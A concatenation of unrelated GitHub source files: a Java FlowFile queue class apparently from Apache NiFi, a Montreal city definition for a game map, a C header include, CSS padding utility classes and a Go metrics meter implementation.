    final Long expirationTime = getExpirationDate(flowFile, expirationMillis);
    return isLaterThan(expirationTime);
}
/**
 * Returns true only when the given timestamp is non-null and lies in the past
 * (i.e. the associated FlowFile has expired). A null timestamp means "never expires".
 */
private boolean isLaterThan(final Long maxAge) {
    return maxAge != null && maxAge < System.currentTimeMillis();
}
/**
 * Computes the absolute time (epoch millis) at which the given FlowFile expires.
 *
 * @param flowFile the FlowFile whose entry date is used; may be null
 * @param expirationMillis maximum age in milliseconds; <= 0 disables expiration
 * @return the expiration timestamp, or null when the FlowFile is null or expiration is disabled
 */
private Long getExpirationDate(final FlowFile flowFile, final long expirationMillis) {
    if (flowFile == null || expirationMillis <= 0) {
        return null;
    }
    return flowFile.getEntryDate() + expirationMillis;
}
/**
 * Drains up to {@code maxResults} FlowFiles from {@code sourceQueue} into
 * {@code destination}, diverting expired records into {@code expiredRecords}.
 * Stops early when the head of the queue is penalized (it is put back first) or when
 * the per-iteration expiration cap is reached.
 *
 * @return the total bytes removed from the source queue: destination records PLUS
 *         expired records (the penalized record that is put back is NOT counted,
 *         because the loop breaks before the size is accumulated)
 */
private long drainQueue(final Queue<FlowFileRecord> sourceQueue, final List<FlowFileRecord> destination, int maxResults, final Set<FlowFileRecord> expiredRecords, final long expirationMillis) {
long drainedSize = 0L;
FlowFileRecord pulled;
while (destination.size() < maxResults && (pulled = sourceQueue.poll()) != null) {
if (isExpired(pulled, expirationMillis)) {
expiredRecords.add(pulled);
// Expired bytes still count toward drainedSize (accumulated below);
// the caller compensates when computing the unacknowledged delta.
if (expiredRecords.size() >= MAX_EXPIRED_RECORDS_PER_ITERATION) {
break;
}
} else {
if (pulled.isPenalized()) {
// Head is penalized: put it back and stop (break skips the size accumulation).
sourceQueue.add(pulled);
break;
}
destination.add(pulled);
}
drainedSize += pulled.getSize();
}
return drainedSize;
}
/**
 * Linearly scans the active queue for the FlowFile whose UUID attribute matches the
 * given value. Swapped-out and unacknowledged records are not searched.
 *
 * @param flowFileUuid the UUID to look for; null short-circuits to null
 * @return the matching FlowFile, or null if no active record matches
 */
public FlowFileRecord getFlowFile(final String flowFileUuid) {
    if (flowFileUuid == null) {
        return null;
    }
    readLock.lock();
    try {
        // Read through all of the FlowFiles in the queue, looking for a UUID match.
        for (final FlowFileRecord candidate : activeQueue) {
            final String candidateUuid = candidate.getAttribute(CoreAttributes.UUID.key());
            if (flowFileUuid.equals(candidateUuid)) {
                return candidate;
            }
        }
        return null;
    } finally {
        readLock.unlock("getFlowFile");
    }
}
/**
 * Drops (deletes) all FlowFiles in this queue on behalf of the given requestor,
 * in three phases under the write lock: the active queue, the in-memory swap queue,
 * and finally each on-disk swap file (which must be swapped in first).
 * The request's state/size fields are updated as each phase completes, and a
 * cancellation check is performed before each phase.
 *
 * @param dropRequest tracks progress, dropped size, and cancellation state
 * @param requestor identity of the user/component requesting the drop (for auditing)
 */
public void dropFlowFiles(final DropFlowFileRequest dropRequest, final String requestor) {
final String requestIdentifier = dropRequest.getRequestIdentifier();
writeLock.lock();
try {
dropRequest.setState(DropFlowFileState.DROPPING_FLOWFILES);
logger.debug("For DropFlowFileRequest {}, original size is {}", requestIdentifier, size());
try {
// Phase 1: drop everything currently in the active queue.
final List<FlowFileRecord> activeQueueRecords = new ArrayList<>(activeQueue);
QueueSize droppedSize;
try {
if (dropRequest.getState() == DropFlowFileState.CANCELED) {
logger.info("Cancel requested for DropFlowFileRequest {}", requestIdentifier);
return;
}
droppedSize = dropAction.drop(activeQueueRecords, requestor);
logger.debug("For DropFlowFileRequest {}, Dropped {} from active queue", requestIdentifier, droppedSize);
} catch (final IOException ioe) {
logger.error("Failed to drop the FlowFiles from queue {} due to {}", getQueueIdentifier(), ioe.toString());
logger.error("", ioe);
dropRequest.setState(DropFlowFileState.FAILURE, "Failed to drop FlowFiles due to " + ioe.toString());
return;
}
activeQueue.clear();
incrementActiveQueueSize(-droppedSize.getObjectCount(), -droppedSize.getByteCount());
dropRequest.setCurrentSize(size());
dropRequest.setDroppedSize(dropRequest.getDroppedSize().add(droppedSize));
// Phase 2: drop the in-memory swap queue (records queued for swap-out but not yet written).
final QueueSize swapSize = getFlowFileQueueSize().swapQueueSize();
logger.debug("For DropFlowFileRequest {}, Swap Queue has {} elements, Swapped Record Count = {}, Swapped Content Size = {}",
requestIdentifier, swapQueue.size(), swapSize.getObjectCount(), swapSize.getByteCount());
if (dropRequest.getState() == DropFlowFileState.CANCELED) {
logger.info("Cancel requested for DropFlowFileRequest {}", requestIdentifier);
return;
}
try {
droppedSize = dropAction.drop(swapQueue, requestor);
} catch (final IOException ioe) {
logger.error("Failed to drop the FlowFiles from queue {} due to {}", getQueueIdentifier(), ioe.toString());
logger.error("", ioe);
dropRequest.setState(DropFlowFileState.FAILURE, "Failed to drop FlowFiles due to " + ioe.toString());
return;
}
swapQueue.clear();
dropRequest.setCurrentSize(size());
dropRequest.setDroppedSize(dropRequest.getDroppedSize().add(droppedSize));
swapMode = false;
incrementSwapQueueSize(-droppedSize.getObjectCount(), -droppedSize.getByteCount(), 0);
logger.debug("For DropFlowFileRequest {}, dropped {} from Swap Queue", requestIdentifier, droppedSize);
// Phase 3: swap in each on-disk swap file and drop its contents.
final int swapFileCount = swapLocations.size();
final Iterator<String> swapLocationItr = swapLocations.iterator();
while (swapLocationItr.hasNext()) {
final String swapLocation = swapLocationItr.next();
SwapContents swapContents = null;
try {
if (dropRequest.getState() == DropFlowFileState.CANCELED) {
logger.info("Cancel requested for DropFlowFileRequest {}", requestIdentifier);
return;
}
swapContents = swapManager.swapIn(swapLocation, flowFileQueue);
droppedSize = dropAction.drop(swapContents.getFlowFiles(), requestor);
} catch (final IncompleteSwapFileException isfe) {
// Corrupt swap file: drop whatever could be read and warn about the rest.
swapContents = isfe.getPartialContents();
final String warnMsg = "Failed to swap in FlowFiles from Swap File " + swapLocation + " because the file was corrupt. "
+ "Some FlowFiles may not be dropped from the queue until NiFi is restarted.";
logger.warn(warnMsg);
if (eventReporter != null) {
eventReporter.reportEvent(Severity.WARNING, "Drop FlowFiles", warnMsg);
}
} catch (final IOException ioe) {
logger.error("Failed to swap in FlowFiles from Swap File {} in order to drop the FlowFiles for Connection {} due to {}",
swapLocation, getQueueIdentifier(), ioe.toString());
logger.error("", ioe);
if (eventReporter != null) {
eventReporter.reportEvent(Severity.ERROR, "Drop FlowFiles", "Failed to swap in FlowFiles from Swap File " + swapLocation
+ ". The FlowFiles contained in this Swap File will not be dropped from the queue");
}
dropRequest.setState(DropFlowFileState.FAILURE, "Failed to swap in FlowFiles from Swap File " + swapLocation + " due to " + ioe.toString());
if (swapContents != null) {
activeQueue.addAll(swapContents.getFlowFiles()); // ensure that we don't lose the FlowFiles from our queue.
}
return;
}
dropRequest.setDroppedSize(dropRequest.getDroppedSize().add(droppedSize));
incrementSwapQueueSize(-droppedSize.getObjectCount(), -droppedSize.getByteCount(), -1);
dropRequest.setCurrentSize(size());
swapLocationItr.remove();
logger.debug("For DropFlowFileRequest {}, dropped {} for Swap File {}", requestIdentifier, droppedSize, swapLocation);
}
logger.debug("Dropped FlowFiles from {} Swap Files", swapFileCount);
logger.info("Successfully dropped {} FlowFiles ({} bytes) from Connection with ID {} on behalf of {}",
dropRequest.getDroppedSize().getObjectCount(), dropRequest.getDroppedSize().getByteCount(), getQueueIdentifier(), requestor);
dropRequest.setState(DropFlowFileState.COMPLETE);
} catch (final Exception e) {
logger.error("Failed to drop FlowFiles from Connection with ID {} due to {}", getQueueIdentifier(), e.toString());
logger.error("", e);
dropRequest.setState(DropFlowFileState.FAILURE, "Failed to drop FlowFiles due to " + e.toString());
}
} finally {
writeLock.unlock("Drop FlowFiles");
}
}
/**
 * Recovers any FlowFiles previously swapped out to disk for this queue's partition.
 * Queries the Swap Manager for swap locations, summarizes each newly-discovered
 * swap file (count, bytes, max record id, resource claims), and folds the totals
 * into this queue's swap accounting.
 *
 * @return a summary of the swapped-out FlowFiles, or null if the Swap Manager
 *         failed to enumerate swap locations
 */
public SwapSummary recoverSwappedFlowFiles() {
    int swapFlowFileCount = 0;
    long swapByteCount = 0L;
    Long maxId = null;
    final List<ResourceClaim> resourceClaims = new ArrayList<>();
    final long startNanos = System.nanoTime();
    int failures = 0;
    writeLock.lock();
    try {
        final List<String> swapLocationsFromSwapManager;
        try {
            swapLocationsFromSwapManager = swapManager.recoverSwapLocations(flowFileQueue, swapPartitionName);
        } catch (final IOException ioe) {
            logger.error("Failed to determine whether or not any Swap Files exist for FlowFile Queue {}", getQueueIdentifier());
            logger.error("", ioe);
            if (eventReporter != null) {
                // Fixed typo in the reported message: "detials" -> "details".
                eventReporter.reportEvent(Severity.ERROR, "FlowFile Swapping", "Failed to determine whether or not any Swap Files exist for FlowFile Queue " +
                    getQueueIdentifier() + "; see logs for more details");
            }
            return null;
        }
        // Filter out any swap locations we already know about: data swapped out *during*
        // this recovery was already accounted for when it was enqueued, before being
        // swapped out, so counting it again here would double-count it.
        final Set<String> recoveredLocations = new LinkedHashSet<>(swapLocationsFromSwapManager);
        recoveredLocations.removeAll(this.swapLocations);
        logger.debug("Swap Manager reports {} Swap Files for {}: {}", recoveredLocations.size(), flowFileQueue, recoveredLocations);
        for (final String swapLocation : recoveredLocations) {
            try {
                final SwapSummary summary = swapManager.getSwapSummary(swapLocation);
                final QueueSize queueSize = summary.getQueueSize();
                final Long maxSwapRecordId = summary.getMaxFlowFileId();
                if (maxSwapRecordId != null && (maxId == null || maxSwapRecordId > maxId)) {
                    maxId = maxSwapRecordId;
                }
                swapFlowFileCount += queueSize.getObjectCount();
                swapByteCount += queueSize.getByteCount();
                resourceClaims.addAll(summary.getResourceClaims());
            } catch (final IOException ioe) {
                failures++;
                logger.error("Failed to recover FlowFiles from Swap File {}; the file appears to be corrupt", swapLocation);
                logger.error("", ioe);
                if (eventReporter != null) {
                    eventReporter.reportEvent(Severity.ERROR, "FlowFile Swapping", "Failed to recover FlowFiles from Swap File " + swapLocation +
                        "; the file appears to be corrupt. See logs for more details");
                }
            }
        }
        incrementSwapQueueSize(swapFlowFileCount, swapByteCount, recoveredLocations.size());
        this.swapLocations.addAll(recoveredLocations);
    } finally {
        writeLock.unlock("Recover Swap Files");
    }
    // Intentionally reads the *field* here: the original code's local variable shadowed
    // the field inside the try block and went out of scope before this check, so the
    // logged counts include any pre-existing swap locations as well.
    if (this.swapLocations.isEmpty()) {
        logger.debug("No swap files were recovered for {}", flowFileQueue);
    } else {
        final long millis = TimeUnit.NANOSECONDS.toMillis(System.nanoTime() - startNanos);
        logger.info("Recovered {} swap files for {} in {} millis", this.swapLocations.size() - failures, this, millis);
    }
    return new StandardSwapSummary(new QueueSize(swapFlowFileCount, swapByteCount), maxId, resourceClaims);
}
/**
 * Atomically adjusts the active-queue portion of this queue's size via a CAS retry loop,
 * leaving the swap and unacknowledged portions untouched.
 *
 * @param count delta to apply to the active record count (may be negative)
 * @param bytes delta to apply to the active byte count (may be negative)
 */
protected void incrementActiveQueueSize(final int count, final long bytes) {
    boolean updated = false;
    while (!updated) {
        // Use the accessor for consistency with incrementSwapQueueSize().
        final FlowFileQueueSize original = getFlowFileQueueSize();
        final FlowFileQueueSize newSize = new FlowFileQueueSize(
            original.getActiveCount() + count, original.getActiveBytes() + bytes,
            original.getSwappedCount(), original.getSwappedBytes(), original.getSwapFileCount(),
            original.getUnacknowledgedCount(), original.getUnacknowledgedBytes());
        updated = updateSize(original, newSize);
        if (updated) {
            // Only log once the new size has actually been published.
            logIfNegative(original, newSize, "active");
        }
    }
}
/**
 * Atomically adjusts the swapped-out portion of this queue's size via a CAS retry loop.
 *
 * @param count delta to apply to the swapped record count (may be negative)
 * @param bytes delta to apply to the swapped byte count (may be negative)
 * @param fileCount delta to apply to the number of swap files (may be negative)
 */
private void incrementSwapQueueSize(final int count, final long bytes, final int fileCount) {
boolean updated = false;
while (!updated) {
final FlowFileQueueSize original = getFlowFileQueueSize();
final FlowFileQueueSize newSize = new FlowFileQueueSize(original.getActiveCount(), original.getActiveBytes(),
original.getSwappedCount() + count, original.getSwappedBytes() + bytes, original.getSwapFileCount() + fileCount,
original.getUnacknowledgedCount(), original.getUnacknowledgedBytes());
updated = updateSize(original, newSize);
if (updated) {
// Only log once the new size has actually been published.
logIfNegative(original, newSize, "swap");
}
}
}
/**
 * Atomically adjusts the unacknowledged portion of this queue's size via a CAS retry loop,
 * leaving the active and swap portions untouched.
 *
 * @param count delta to apply to the unacknowledged record count (may be negative)
 * @param bytes delta to apply to the unacknowledged byte count (may be negative)
 */
private void incrementUnacknowledgedQueueSize(final int count, final long bytes) {
    boolean updated = false;
    while (!updated) {
        // Use the accessor for consistency with incrementSwapQueueSize().
        final FlowFileQueueSize original = getFlowFileQueueSize();
        final FlowFileQueueSize newSize = new FlowFileQueueSize(original.getActiveCount(), original.getActiveBytes(),
            original.getSwappedCount(), original.getSwappedBytes(), original.getSwapFileCount(),
            original.getUnacknowledgedCount() + count, original.getUnacknowledgedBytes() + bytes);
        updated = updateSize(original, newSize);
        if (updated) {
            logIfNegative(original, newSize, "Unacknowledged");
        }
    }
}
/**
 * Logs an error (with a stack trace for forensics) if any component of the new queue
 * size dropped below zero, which indicates a bookkeeping bug elsewhere.
 * NOTE(review): the swap *file* count is not checked here, only record/byte counts —
 * confirm whether that is intentional.
 */
private void logIfNegative(final FlowFileQueueSize original, final FlowFileQueueSize newSize, final String counterName) {
if (newSize.getActiveBytes() < 0 || newSize.getActiveCount() < 0
|| newSize.getSwappedBytes() < 0 || newSize.getSwappedCount() < 0
|| newSize.getUnacknowledgedBytes() < 0 || newSize.getUnacknowledgedCount() < 0) {
// The RuntimeException is never thrown; it only supplies a stack trace to the log.
logger.error("Updated Size of Queue " + counterName + " from " + original + " to " + newSize, new RuntimeException("Cannot create negative queue size"));
}
}
/**
 * Atomically publishes {@code updated} as the queue size iff the current size is still
 * {@code expected} (compare-and-set).
 *
 * @return true if the swap succeeded; false if another thread changed the size first
 */
protected boolean updateSize(final FlowFileQueueSize expected, final FlowFileQueueSize updated) {
return size.compareAndSet(expected, updated);
}
/** Returns the current (active + swapped + unacknowledged) size snapshot of this queue. */
public FlowFileQueueSize getFlowFileQueueSize() {
return size.get();
}
/**
 * Absorbs the contents of another queue (typically produced by packageForRebalance):
 * its active FlowFiles are enqueued here and its swap locations/size are adopted.
 */
public void inheritQueueContents(final FlowFileQueueContents queueContents) {
writeLock.lock();
try {
// putAll handles active-queue size accounting for the inherited records.
putAll(queueContents.getActiveFlowFiles());
final List<String> inheritedSwapLocations = queueContents.getSwapLocations();
swapLocations.addAll(inheritedSwapLocations);
incrementSwapQueueSize(queueContents.getSwapSize().getObjectCount(), queueContents.getSwapSize().getByteCount(), queueContents.getSwapLocations().size());
if (!inheritedSwapLocations.isEmpty()) {
logger.debug("Inherited the following swap locations: {}", inheritedSwapLocations);
}
} finally {
writeLock.unlock("inheritQueueContents");
}
}
/**
 * Empties this queue and packages its contents for transfer to another partition:
 * active records (including the in-memory swap queue) plus renamed swap-file locations.
 * Unacknowledged records stay with this queue. The returned contents are intended to be
 * passed to inheritQueueContents() on the destination.
 *
 * @param newPartitionName the partition that will own the packaged contents
 * @return the packaged active records, updated swap locations, and swap size
 */
public FlowFileQueueContents packageForRebalance(final String newPartitionName) {
writeLock.lock();
try {
final List<FlowFileRecord> activeRecords = new ArrayList<>(this.activeQueue);
final List<String> updatedSwapLocations = new ArrayList<>(swapLocations.size());
for (final String swapLocation : swapLocations) {
try {
// Rename each swap file so the destination partition owns it.
final String updatedSwapLocation = swapManager.changePartitionName(swapLocation, newPartitionName);
updatedSwapLocations.add(updatedSwapLocation);
} catch (final IOException ioe) {
// A failed rename drops the location from the packaged list (logged, not rethrown).
logger.error("Failed to update Swap File {} to reflect that the contents are now owned by Partition '{}'", swapLocation, newPartitionName, ioe);
}
}
this.swapLocations.clear();
this.activeQueue.clear();
// Fold the in-memory swap queue into the active records being handed off.
final int swapQueueCount = swapQueue.size();
final long swapQueueBytes = swapQueue.stream().mapToLong(FlowFileRecord::getSize).sum();
activeRecords.addAll(swapQueue);
swapQueue.clear();
this.swapMode = false;
QueueSize swapSize;
boolean updated;
do {
// CAS loop: zero out active/swap accounting while preserving unacknowledged counts.
final FlowFileQueueSize currentSize = getFlowFileQueueSize();
// In-memory swap-queue records travel as active records, so subtract them
// from the swapped size reported to the destination.
swapSize = new QueueSize(currentSize.getSwappedCount() - swapQueueCount, currentSize.getSwappedBytes() - swapQueueBytes);
final FlowFileQueueSize updatedSize = new FlowFileQueueSize(0, 0, 0, 0, 0, currentSize.getUnacknowledgedCount(), currentSize.getUnacknowledgedBytes());
updated = updateSize(currentSize, updatedSize);
} while (!updated);
logger.debug("Cleared {} to package FlowFile for rebalance to {}", this, newPartitionName);
return new FlowFileQueueContents(activeRecords, updatedSwapLocations, swapSize);
} finally {
writeLock.unlock("packageForRebalance(SwappablePriorityQueue)");
}
}
@Override
public String toString() {
    // Identify both the owning queue and the partition this sub-queue serves.
    return String.format("SwappablePriorityQueue[queueId=%s, partition=%s]",
        flowFileQueue.getIdentifier(), swapPartitionName);
}
}
| {
"pile_set_name": "Github"
} |
# City definition: Montreal, a major city located in the canada region.
montreal = {
name = "Montreal"
map_template = north_america_45_60_latitude_north
geocoordinate = { -73.58329695810 45.49999920560 } #from Natural Earth
major = true
regions = {
canada
}
}
| {
"pile_set_name": "Github"
} |
/* file generated by 'generate-global-headers.bat' */
#include "..\../crypto/bf/blowfish.h"
| {
"pile_set_name": "Github"
} |
.p-0 padding: 0;
.p-1 padding: 0.25rem;
.p-2 padding: 0.5rem;
.p-3 padding: 0.75rem;
.p-4 padding: 1rem;
.p-5 padding: 1.25rem;
.p-6 padding: 1.5rem;
.p-8 padding: 2rem;
.p-10 padding: 2.5rem;
.p-12 padding: 3rem;
.p-16 padding: 4rem;
.p-20 padding: 5rem;
.p-24 padding: 6rem;
.p-32 padding: 8rem;
.p-40 padding: 10rem;
.p-48 padding: 12rem;
.p-56 padding: 14rem;
.p-64 padding: 16rem;
.p-px padding: 1px;
.py-0 padding-top: 0; padding-bottom: 0;
.py-1 padding-top: 0.25rem; padding-bottom: 0.25rem;
.py-2 padding-top: 0.5rem; padding-bottom: 0.5rem;
.py-3 padding-top: 0.75rem; padding-bottom: 0.75rem;
.py-4 padding-top: 1rem; padding-bottom: 1rem;
.py-5 padding-top: 1.25rem; padding-bottom: 1.25rem;
.py-6 padding-top: 1.5rem; padding-bottom: 1.5rem;
.py-8 padding-top: 2rem; padding-bottom: 2rem;
.py-10 padding-top: 2.5rem; padding-bottom: 2.5rem;
.py-12 padding-top: 3rem; padding-bottom: 3rem;
.py-16 padding-top: 4rem; padding-bottom: 4rem;
.py-20 padding-top: 5rem; padding-bottom: 5rem;
.py-24 padding-top: 6rem; padding-bottom: 6rem;
.py-32 padding-top: 8rem; padding-bottom: 8rem;
.py-40 padding-top: 10rem; padding-bottom: 10rem;
.py-48 padding-top: 12rem; padding-bottom: 12rem;
.py-56 padding-top: 14rem; padding-bottom: 14rem;
.py-64 padding-top: 16rem; padding-bottom: 16rem;
.py-px padding-top: 1px; padding-bottom: 1px;
.px-0 padding-right: 0; padding-left: 0;
.px-1 padding-right: 0.25rem; padding-left: 0.25rem;
.px-2 padding-right: 0.5rem; padding-left: 0.5rem;
.px-3 padding-right: 0.75rem; padding-left: 0.75rem;
.px-4 padding-right: 1rem; padding-left: 1rem;
.px-5 padding-right: 1.25rem; padding-left: 1.25rem;
.px-6 padding-right: 1.5rem; padding-left: 1.5rem;
.px-8 padding-right: 2rem; padding-left: 2rem;
.px-10 padding-right: 2.5rem; padding-left: 2.5rem;
.px-12 padding-right: 3rem; padding-left: 3rem;
.px-16 padding-right: 4rem; padding-left: 4rem;
.px-20 padding-right: 5rem; padding-left: 5rem;
.px-24 padding-right: 6rem; padding-left: 6rem;
.px-32 padding-right: 8rem; padding-left: 8rem;
.px-40 padding-right: 10rem; padding-left: 10rem;
.px-48 padding-right: 12rem; padding-left: 12rem;
.px-56 padding-right: 14rem; padding-left: 14rem;
.px-64 padding-right: 16rem; padding-left: 16rem;
.px-px padding-right: 1px; padding-left: 1px;
.pt-0 padding-top: 0;
.pt-1 padding-top: 0.25rem;
.pt-2 padding-top: 0.5rem;
.pt-3 padding-top: 0.75rem;
.pt-4 padding-top: 1rem;
.pt-5 padding-top: 1.25rem;
.pt-6 padding-top: 1.5rem;
.pt-8 padding-top: 2rem;
.pt-10 padding-top: 2.5rem;
.pt-12 padding-top: 3rem;
.pt-16 padding-top: 4rem;
.pt-20 padding-top: 5rem;
.pt-24 padding-top: 6rem;
.pt-32 padding-top: 8rem;
.pt-40 padding-top: 10rem;
.pt-48 padding-top: 12rem;
.pt-56 padding-top: 14rem;
.pt-64 padding-top: 16rem;
.pt-px padding-top: 1px;
.pr-0 padding-right: 0;
.pr-1 padding-right: 0.25rem;
.pr-2 padding-right: 0.5rem;
.pr-3 padding-right: 0.75rem;
.pr-4 padding-right: 1rem;
.pr-5 padding-right: 1.25rem;
.pr-6 padding-right: 1.5rem;
.pr-8 padding-right: 2rem;
.pr-10 padding-right: 2.5rem;
.pr-12 padding-right: 3rem;
.pr-16 padding-right: 4rem;
.pr-20 padding-right: 5rem;
.pr-24 padding-right: 6rem;
.pr-32 padding-right: 8rem;
.pr-40 padding-right: 10rem;
.pr-48 padding-right: 12rem;
.pr-56 padding-right: 14rem;
.pr-64 padding-right: 16rem;
.pr-px padding-right: 1px;
.pb-0 padding-bottom: 0;
.pb-1 padding-bottom: 0.25rem;
.pb-2 padding-bottom: 0.5rem;
.pb-3 padding-bottom: 0.75rem;
.pb-4 padding-bottom: 1rem;
.pb-5 padding-bottom: 1.25rem;
.pb-6 padding-bottom: 1.5rem;
.pb-8 padding-bottom: 2rem;
.pb-10 padding-bottom: 2.5rem;
.pb-12 padding-bottom: 3rem;
.pb-16 padding-bottom: 4rem;
.pb-20 padding-bottom: 5rem;
.pb-24 padding-bottom: 6rem;
.pb-32 padding-bottom: 8rem;
.pb-40 padding-bottom: 10rem;
.pb-48 padding-bottom: 12rem;
.pb-56 padding-bottom: 14rem;
.pb-64 padding-bottom: 16rem;
.pb-px padding-bottom: 1px;
.pl-0 padding-left: 0;
.pl-1 padding-left: 0.25rem;
.pl-2 padding-left: 0.5rem;
.pl-3 padding-left: 0.75rem;
.pl-4 padding-left: 1rem;
.pl-5 padding-left: 1.25rem;
.pl-6 padding-left: 1.5rem;
.pl-8 padding-left: 2rem;
.pl-10 padding-left: 2.5rem;
.pl-12 padding-left: 3rem;
.pl-16 padding-left: 4rem;
.pl-20 padding-left: 5rem;
.pl-24 padding-left: 6rem;
.pl-32 padding-left: 8rem;
.pl-40 padding-left: 10rem;
.pl-48 padding-left: 12rem;
.pl-56 padding-left: 14rem;
.pl-64 padding-left: 16rem;
.pl-px padding-left: 1px;
| {
"pile_set_name": "Github"
} |
package metrics
import (
"math"
"sync"
"sync/atomic"
"time"
)
// Meter counts events to produce exponentially-weighted moving average rates
// at one-, five-, and fifteen-minute intervals, plus a mean rate since creation.
type Meter interface {
// Count returns the total number of events recorded.
Count() int64
// Mark records the occurrence of n events.
Mark(int64)
// Rate1 returns the one-minute moving average rate of events per second.
Rate1() float64
// Rate5 returns the five-minute moving average rate of events per second.
Rate5() float64
// Rate15 returns the fifteen-minute moving average rate of events per second.
Rate15() float64
// RateMean returns the mean rate of events per second since the meter was created.
RateMean() float64
// Snapshot returns a read-only copy of the meter.
Snapshot() Meter
// Stop halts background ticking; Mark becomes a no-op afterward.
Stop()
}
// GetOrRegisterMeter returns an existing Meter registered under name in r
// (or DefaultRegistry when r is nil), constructing and registering a new
// StandardMeter if none exists.
// Be sure to unregister the meter from the registry once it is of no use to
// allow for garbage collection.
func GetOrRegisterMeter(name string, r Registry) Meter {
if nil == r {
r = DefaultRegistry
}
return r.GetOrRegister(name, NewMeter).(Meter)
}
// NewMeter constructs a new StandardMeter and registers it with the shared
// arbiter, launching the arbiter's ticking goroutine on first use.
// Be sure to call Stop() once the meter is of no use to allow for garbage collection.
func NewMeter() Meter {
if UseNilMetrics {
return NilMeter{}
}
m := newStandardMeter()
arbiter.Lock()
defer arbiter.Unlock()
arbiter.meters[m] = struct{}{}
// Start the single shared ticking goroutine exactly once.
if !arbiter.started {
arbiter.started = true
go arbiter.tick()
}
return m
}
// NewRegisteredMeter constructs a new StandardMeter (launching the ticking
// goroutine if needed) and registers it under name in r, or DefaultRegistry
// when r is nil.
// Be sure to unregister the meter from the registry once it is of no use to
// allow for garbage collection.
func NewRegisteredMeter(name string, r Registry) Meter {
c := NewMeter()
if nil == r {
r = DefaultRegistry
}
r.Register(name, c)
return c
}
// MeterSnapshot is a read-only copy of another Meter. The rate fields hold
// float64 values stored as their IEEE-754 bit patterns (see math.Float64frombits)
// so they can be read/written atomically by StandardMeter.
type MeterSnapshot struct {
count int64
rate1, rate5, rate15, rateMean uint64
}
// Count returns the count of events at the time the snapshot was taken.
func (m *MeterSnapshot) Count() int64 { return m.count }
// Mark panics: snapshots are immutable.
func (*MeterSnapshot) Mark(n int64) {
panic("Mark called on a MeterSnapshot")
}
// Rate1 returns the one-minute moving average rate of events per second at the
// time the snapshot was taken.
func (m *MeterSnapshot) Rate1() float64 { return math.Float64frombits(m.rate1) }
// Rate5 returns the five-minute moving average rate of events per second at
// the time the snapshot was taken.
func (m *MeterSnapshot) Rate5() float64 { return math.Float64frombits(m.rate5) }
// Rate15 returns the fifteen-minute moving average rate of events per second
// at the time the snapshot was taken.
func (m *MeterSnapshot) Rate15() float64 { return math.Float64frombits(m.rate15) }
// RateMean returns the meter's mean rate of events per second at the time the
// snapshot was taken.
func (m *MeterSnapshot) RateMean() float64 { return math.Float64frombits(m.rateMean) }
// Snapshot returns the snapshot itself (it is already read-only).
func (m *MeterSnapshot) Snapshot() Meter { return m }
// Stop is a no-op.
func (m *MeterSnapshot) Stop() {}
// NilMeter is a no-op Meter, used when UseNilMetrics disables metric collection.
type NilMeter struct{}
// Count is a no-op.
func (NilMeter) Count() int64 { return 0 }
// Mark is a no-op.
func (NilMeter) Mark(n int64) {}
// Rate1 is a no-op.
func (NilMeter) Rate1() float64 { return 0.0 }
// Rate5 is a no-op.
func (NilMeter) Rate5() float64 { return 0.0 }
// Rate15 is a no-op.
func (NilMeter) Rate15() float64 { return 0.0 }
// RateMean is a no-op.
func (NilMeter) RateMean() float64 { return 0.0 }
// Snapshot is a no-op.
func (NilMeter) Snapshot() Meter { return NilMeter{} }
// Stop is a no-op.
func (NilMeter) Stop() {}
// StandardMeter is the standard implementation of a Meter. Readers and writers
// share the embedded snapshot via atomic loads/stores; the EWMAs are advanced
// by the shared arbiter goroutine every 5 seconds.
type StandardMeter struct {
snapshot *MeterSnapshot
a1, a5, a15 EWMA
startTime time.Time
stopped uint32
}
// newStandardMeter constructs a StandardMeter with one-, five-, and
// fifteen-minute EWMAs; the caller is responsible for arbiter registration.
func newStandardMeter() *StandardMeter {
return &StandardMeter{
snapshot: &MeterSnapshot{},
a1: NewEWMA1(),
a5: NewEWMA5(),
a15: NewEWMA15(),
startTime: time.Now(),
}
}
// Stop stops the meter; Mark() will be a no-op if you use it after being stopped.
// The CompareAndSwap guarantees the arbiter deregistration happens only once.
func (m *StandardMeter) Stop() {
if atomic.CompareAndSwapUint32(&m.stopped, 0, 1) {
arbiter.Lock()
delete(arbiter.meters, m)
arbiter.Unlock()
}
}
// Count returns the number of events recorded.
func (m *StandardMeter) Count() int64 {
return atomic.LoadInt64(&m.snapshot.count)
}
// Mark records the occurrence of n events.
func (m *StandardMeter) Mark(n int64) {
// Silently ignore marks after Stop().
if atomic.LoadUint32(&m.stopped) == 1 {
return
}
atomic.AddInt64(&m.snapshot.count, n)
m.a1.Update(n)
m.a5.Update(n)
m.a15.Update(n)
m.updateSnapshot()
}
// Rate1 returns the one-minute moving average rate of events per second.
func (m *StandardMeter) Rate1() float64 {
return math.Float64frombits(atomic.LoadUint64(&m.snapshot.rate1))
}
// Rate5 returns the five-minute moving average rate of events per second.
func (m *StandardMeter) Rate5() float64 {
return math.Float64frombits(atomic.LoadUint64(&m.snapshot.rate5))
}
// Rate15 returns the fifteen-minute moving average rate of events per second.
func (m *StandardMeter) Rate15() float64 {
return math.Float64frombits(atomic.LoadUint64(&m.snapshot.rate15))
}
// RateMean returns the meter's mean rate of events per second since creation.
func (m *StandardMeter) RateMean() float64 {
return math.Float64frombits(atomic.LoadUint64(&m.snapshot.rateMean))
}
// Snapshot returns a read-only copy of the meter. Each field is loaded
// atomically, though the copy as a whole is not a single atomic read.
func (m *StandardMeter) Snapshot() Meter {
copiedSnapshot := MeterSnapshot{
count: atomic.LoadInt64(&m.snapshot.count),
rate1: atomic.LoadUint64(&m.snapshot.rate1),
rate5: atomic.LoadUint64(&m.snapshot.rate5),
rate15: atomic.LoadUint64(&m.snapshot.rate15),
rateMean: atomic.LoadUint64(&m.snapshot.rateMean),
}
return &copiedSnapshot
}
// updateSnapshot recomputes all rates and publishes them to the shared
// snapshot as atomic uint64 bit patterns.
func (m *StandardMeter) updateSnapshot() {
rate1 := math.Float64bits(m.a1.Rate())
rate5 := math.Float64bits(m.a5.Rate())
rate15 := math.Float64bits(m.a15.Rate())
rateMean := math.Float64bits(float64(m.Count()) / time.Since(m.startTime).Seconds())
atomic.StoreUint64(&m.snapshot.rate1, rate1)
atomic.StoreUint64(&m.snapshot.rate5, rate5)
atomic.StoreUint64(&m.snapshot.rate15, rate15)
atomic.StoreUint64(&m.snapshot.rateMean, rateMean)
}
// tick advances the meter's EWMAs; invoked by the arbiter goroutine.
func (m *StandardMeter) tick() {
m.a1.Tick()
m.a5.Tick()
m.a15.Tick()
m.updateSnapshot()
}
